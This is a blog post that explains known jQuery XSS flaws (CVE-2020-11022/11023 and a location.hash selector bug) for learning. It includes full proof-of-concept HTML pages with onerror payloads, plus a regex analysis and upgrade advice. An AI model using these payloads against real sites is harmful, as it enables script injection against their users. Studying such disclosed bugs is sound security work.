A First Look at XSS in jQuery
A problem I came across while searching during a class a year ago, when I was learning jQuery development.
I am not particularly interested in jQuery development: projects with a separated front end and back end are uniformly Vue and React, and even projects without that separation have solutions closer to native JS such as Alpine.js and Layui. This post just records what I saw.
XSS (cross-site scripting) doesn't count as a vulnerability anyway, right 🤣
CVE-2020-11022/CVE-2020-11023 https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html
This test page provides tests for CVE-2020-11022/CVE-2020-11023; the affected range is jQuery v1.2.0 to v3.5.0.
Reproduction code:
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
<script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.js"></script>
</head>
<body>
<script>
// Reads the already "sanitized" markup out of the <xmp> for PoC n and inserts it
// either directly via innerHTML (safe) or through jQuery's .html() (affected).
function test(n, jq) {
  var sanitizedHTML = document.getElementById('poc' + n).innerHTML;
  if (jq) {
    $('#div').html(sanitizedHTML);
  } else {
    document.getElementById('div').innerHTML = sanitizedHTML;
  }
}
</script>
<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
<p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a></p>
<h2>PoC 1</h2>
<button onclick="test(1)">Assign to innerHTML</button>
<button onclick="test(1,true)">Append via .html()</button>
<xmp id="poc1">
<style><style/><img src=x onerror=alert(1)>
</xmp>
<h2>PoC 2 (Only jQuery 3.x affected)</h2>
<button onclick="test(2)">Assign to innerHTML</button>
<button onclick="test(2,true)">Append via .html()</button>
<xmp id="poc2">
<img alt="<x" title="/><img src=x onerror=alert(1)>">
</xmp>
<h2>PoC 3</h2>
<button onclick="test(3)">Assign to innerHTML</button>
<button onclick="test(3,true)">Append via .html()</button>
<xmp id="poc3">
<option><style></option></select><img src=x onerror=alert(1)></style>
</xmp>
<div id="div"></div>
</body>
</html>
```
Trigger conditions:
the system processes user input with jQuery methods such as html(), append() or $('<tag>');
the user input has already been "sanitized".
MITRE's description of this vulnerability:
passing HTML from untrusted sources - even after sanitizing it - to one of jQuery’s DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code.
I think the CSDN article below explains it well enough, so I am being lazy and not writing it up myself:
Web安全-JQuery框架XSS漏洞浅析 (Web Security: a brief analysis of the jQuery framework XSS vulnerability)
The problem is caused by a regular expression that does not cover every case.
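To make the regular-expression point concrete, here is an added example (not from the original post or from jQuery itself) that replays the pre-3.5.0 htmlPrefilter rewrite on the PoC 1 and PoC 2 strings above and compares it with the 3.5.0 behaviour. The two regexes are my recollection of jQuery's rxhtmlTag for the 1.x/2.x and 3.0-3.4 lines and should be checked against the exact version you ship; PoC 3 contains no self-closing tag, so this rewrite leaves it unchanged.

```javascript
'use strict';

// jQuery 1.x/2.x (as recalled): the tag-name group only accepts word characters,
// so it stops at a quote.
const RX_SELF_CLOSING_LEGACY =
  /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:-]+)[^>]*)\/>/gi;
// jQuery 3.0-3.4 (as recalled): the tag-name group accepts almost anything but
// whitespace, '/' and '>', so it can swallow a quote and close an attribute early.
const RX_SELF_CLOSING_3X =
  /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi;

// Before 3.5.0 htmlPrefilter expanded <tag/> into <tag></tag>, AFTER the caller
// had already sanitized the string, which is what changes the parse context.
function htmlPrefilterBefore35(html, rx) {
  return html.replace(rx, '<$1></$2>');
}

// From 3.5.0 on htmlPrefilter returns the markup untouched.
function htmlPrefilter35(html) {
  return html;
}

// Constructed inputs: the PoC 1 and PoC 2 strings shown on the page.
const POC1 = '<style><style/><img src=x onerror=alert(1)>';
const POC2 = '<img alt="<x" title="/><img src=x onerror=alert(1)>">';

// Defender-side check: did the prefilter emit an end tag that the sanitized
// input never contained? If so, the sanitizer's view of the markup is stale.
function introducesEndTag(before, after) {
  const count = (s) => (s.match(/<\/[a-z][^>]*>/gi) || []).length;
  return count(after) > count(before);
}

function demo() {
  return {
    // PoC 1: '<style/>' becomes '<style></style>', so the outer <style> is closed
    // and the following <img> turns from CSS text into a real element.
    poc1Legacy: htmlPrefilterBefore35(POC1, RX_SELF_CLOSING_LEGACY),
    poc1V3: htmlPrefilterBefore35(POC1, RX_SELF_CLOSING_3X),
    // PoC 2: only the 3.x regex captures 'x"' as the tag name, producing '</x">'
    // whose quote terminates the title attribute and ends the first <img> tag.
    poc2Legacy: htmlPrefilterBefore35(POC2, RX_SELF_CLOSING_LEGACY),
    poc2V3: htmlPrefilterBefore35(POC2, RX_SELF_CLOSING_3X),
    poc1Fixed: htmlPrefilter35(POC1),
  };
}
```

The practical consequence is that sanitizing before .html() is not enough on affected versions; upgrade to 3.5.0 or later, or sanitize the string the DOM actually receives.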
A pwnfunction challenge related to this vulnerability
DOM-based XSS (CVE-2016-7103 and others): a flawed regular expression lets location.hash trigger a cross-site scripting attack.
Jquery BigTracker
Reproduction code:
```html
<!DOCTYPE html>
<html lang="zh">
<head>
<title>Jquery XSS</title>
<script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.6.1/jquery.js"></script>
<script>
$(function () {
  // The fragment after '#' is passed straight to $() as a "selector";
  // old jQuery treats a string starting with '<' as HTML and creates the element.
  var e = location.hash.split('#')[1];
  $(e);
});
</script>
</head>
<body>
<h1>JQuery with XSS Demo</h1>
<ul>
<li><a href="#<img src=/ onerror=alert(1)>" target="_blank">Click here!</a></li>
</ul>
</body>
</html>
```
An ancient bug 🤣: it cannot be triggered in Chrome or Firefox (the payload seems to get escaped); you need IE to test it.
References: jQuery XSS vulnerability (CVE-2020-11022)